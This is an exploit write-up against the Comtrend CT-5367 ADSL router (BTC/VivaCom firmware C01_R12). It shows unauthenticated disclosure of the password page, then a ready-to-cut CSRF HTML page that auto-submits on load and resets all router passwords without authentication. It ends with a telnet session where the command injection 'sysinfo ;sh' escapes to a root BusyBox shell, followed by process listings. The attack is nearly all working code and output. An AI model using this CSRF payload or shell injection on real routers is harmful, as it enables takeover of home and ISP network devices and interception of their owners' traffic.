/*COMTREND ADSL Router BTC(VivaCom) CT-5367 C01_R12  Remote Root
=============================================================================
Board ID	: 96338A-122
Software	: A111-312BTC-C01_R12
Bootloader	: 1.0.37-12.1-1
Wireless Driver	: 4.170.16.0.cpe2.1sd
ADSL		: A2pB023k.d20k_rc2

=============================================================================
Type		: HardWare
Risk of use	: High
Type to use	: Remote
Discovered by	: Todor Donev
Author Email	: todor.donev@gmail.com

=============================================================================
Special greetz to my sweetheart friend and my lil' secret Tsvetelina Emirska,
and all my other friends that support me a lot of times for everything !!

*/

root@linux:~#  get.pl http://192.168.1.1/

/*HTTP/1.1 401 Unauthorized
Cache-Control: no-cache
Connection: close
Date: Sat, 01 Jan 2000 00:04:31 GMT
Server: micro_httpd                        ## Yeah !! Bite me :(
WWW-Authenticate: Basic realm="DSL Router"
Content-Type: text/html

<HTML><HEAD><TITLE>401 Unauthorized</TITLE></HEAD>
<BODY BGCOLOR="#cc9999"><H4>401 Unauthorized</H4>
Authorization required.
<HR>
<ADDRESS><A HREF="http://www.acme.com/software/micro_httpd/">micro_httpd</A></ADDRESS>
</BODY></HTML>
*/

root@linux:~#  get.pl http://192.168.1.1/password.cgi   ## Information Disclosure

/*HTTP/1.1 200 Ok
Cache-Control: no-cache
Connection: close
Date: Mon, 03 Jan 2000 23:01:25 GMT
Server: micro_httpd
Content-Type: text/html

<html>
   <head>
      <meta HTTP-EQUIV='Pragma' CONTENT='no-cache'>
      <link rel="stylesheet" href='stylemain.css' type='text/css'>
         <link rel="stylesheet" href='colors.css' type='text/css'>
            <script language="javascript" src="util.js"></script>
            <script language="javascript">
<!-- hide\n                               ## Dammit! =))
pwdAdmin = '<CENSORED>';                  ## Censored Password
pwdSupport = '<CENSORED>';                ## Censored Password
pwdUser = '<CENSORED>';\n                 ## Censored Password
*/



[CUT EXPLOIT HERE]                        ## CSRF For Change All passwords
<html>
<head></head>
<title>COMTREND ADSL Router BTC(VivaCom) CT-5367 C01_R12 Change All passwords</title>
<body onLoad=javascript:document.form.submit()>
<form action="http://192.168.1.1/password.cgi"; method="POST" name="form">
<!-- Change default system Passwords to "shpek" without authentication and verification -->
<input type="hidden" name="sptPassword" value="shpek">
<input type="hidden" name="usrPassword" value="shpek">
<input type="hidden" name="sysPassword" value="shpek">
</form>
</body>
</html>
[CUT EXPLOIT HERE]


root@linux:~# telnet 192.168.1.1

ADSL Router Model CT-5367 Sw.Ver. C01_R12
Login: root
Password:
## BINGOO !! Godlike =))
> ?

?
help
logout
reboot
adsl
atm
ddns
dumpcfg
ping
siproxd
sntp
sysinfo
tftp
wlan
version
build
ipfilter

> sysinfo
Number of processes: 30
 11:46pm  up 2 days, 23:46,
load average: 1 min:0.12, 5 min:0.05, 15 min:0.09
              total         used         free       shared      buffers
  Mem:        14012        13028          984            0          588
 Swap:            0            0            0
Total:        14012        13028          984

> sysinfo ;sh                               ## JAILBREAK !! FirmWare sucks  :)
Number of processes: 30
 11:47pm  up 2 days, 23:47,
load average: 1 min:0.07, 5 min:0.05, 15 min:0.08
              total         used         free       shared      buffers
  Mem:        14012        13024          988            0          588
 Swap:            0            0            0
Total:        14012        13024          988


BusyBox v1.00 (2009.12.08-09:42+0000) Built-in shell (msh)
Enter 'help' for a list of built-in commands.

# cat /proc/version
Linux version 2.6.8.1 (wander@localhost.localdomain) (gcc version 3.4.2) #1 Tue Dec 8 17:40:39 CST 2009

# ps
  PID  Uid     VmSize Stat Command
    1 root        280 S   init
    2 root            SWN [ksoftirqd/0]
    3 root            SW< [events/0]
    4 root            SW< [khelper]
    5 root            SW< [kblockd/0]
   15 root            SW  [pdflush]
   16 root            SW  [pdflush]
   17 root            SW  [kswapd0]
   18 root            SW< [aio/0]
   23 root            SW  [mtdblockd]
   32 root        328 S   -sh
   65 root       1384 S   cfm
   72 root            SW  [bcmsw]
  192 root        216 S   pvc2684d
  275 root        496 S   nas -P /var/wl0nas.lan0.pid -H 34954 -l br0 -i wl0 -A
  342 root        304 S   dhcpd
  596 root       1384 S   CT_Polling
  600 root        432 S   pppd -c 0.0.35.1 -i nas_0_0_35 -u <CENSORED> -p
  931 root        248 S   dhcpc -i nas_0_0_40
  993 root        316 S   dproxy -D btc-adsl
  997 root        352 S   upnp -L br0 -W ppp_0_0_35_1 -D
 1013 root        512 S   siproxd --config /var/siproxd/siproxd.conf
 1014 root        512 S   siproxd --config /var/siproxd/siproxd.conf
 1015 root        512 S   siproxd --config /var/siproxd/siproxd.conf
10745 root        292 S   syslogd -C -l 7
10747 root        256 S   klogd
 6616 root       1396 S   telnetd
 6618 root       1428 S   telnetd
 6673 root        284 S   sh -c sysinfo ;sh
 6724 root        284 R   ps

# top
Mem: 13164K used, 848K free, 0K shrd, 588K buff, 5920K cached
Load average: 0.00, 0.02, 0.07    (State: S=sleeping R=running, W=waiting)

  PID USER     STATUS   RSS  PPID %CPU %MEM COMMAND
 6751 root     R        288  6675  0.7  2.0 exe
    2 root     SWN        0     1  0.3  0.0 ksoftirqd/0
 6616 root     S       1396    65  0.1  9.9 telnetd
  931 root     S        248     1  0.1  1.7 dhcpc
 6618 root     S       1428  6616  0.0 10.1 telnetd
   65 root     S       1384    32  0.0  9.8 cfm
  596 root     S       1384    65  0.0  9.8 CT_Polling
 1013 root     S        512     1  0.0  3.6 siproxd
 1014 root     S        512  1013  0.0  3.6 siproxd
 1015 root     S        512  1014  0.0  3.6 siproxd
  275 root     S        496     1  0.0  3.5 nas
  600 root     S        432     1  0.0  3.0 pppd
  997 root     S        352     1  0.0  2.5 upnp
   32 root     S        328     1  0.0  2.3 sh
  993 root     S        316     1  0.0  2.2 dproxy
 6675 root     S        316  6673  0.0  2.2 exe
  342 root     S        304     1  0.0  2.1 dhcpd
10745 root     S        292     1  0.0  2.0 exe
 6673 root     S        284  6618  0.0  2.0 sh
    1 root     S        280     0  0.0  1.9 init
# echo *                                               ## ls o.O?!?                                         
bin dev etc lib linuxrc mnt proc sbin usr var webs
#